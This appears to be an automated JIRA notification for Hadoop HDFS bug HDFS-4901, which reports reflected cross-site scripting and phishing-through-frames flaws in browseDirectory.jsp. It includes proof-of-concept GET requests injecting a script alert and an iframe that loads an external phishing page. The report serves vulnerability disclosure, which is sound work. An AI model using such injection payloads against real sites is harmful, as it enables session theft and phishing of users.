Jeffrey E Rodriguez created HDFS-4901:
------------------------------------------
Summary: Site Scripting and Phishing Through Frames in
browseDirectory.jsp
Key: HDFS-4901
URL: https://issues.apache.org/jira/browse/HDFS-4901
Project: Hadoop HDFS
Issue Type: Bug
Components: security, webhdfs
Affects Versions: 2.0.3-alpha, 1.1.1
Reporter: Jeffrey E Rodriguez
It is possible to steal or manipulate customer session and cookies, which might
be used to impersonate a legitimate user,
allowing the hacker to view or alter user records, and to perform transactions
as that user.
e.g.
GET /browseDirectory.jsp? dir=%2Fhadoop'"/><script>alert(759)</script>
&namenodeInfoPort=50070
Also;
Phishing Through Frames
Try:
GET /browseDirectory.jsp?
dir=%2Fhadoop%27%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E
&namenodeInfoPort=50070 HTTP/1.1
Cookie: JSESSIONID=qd9i8tuccuam1cme71swr9nfi
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
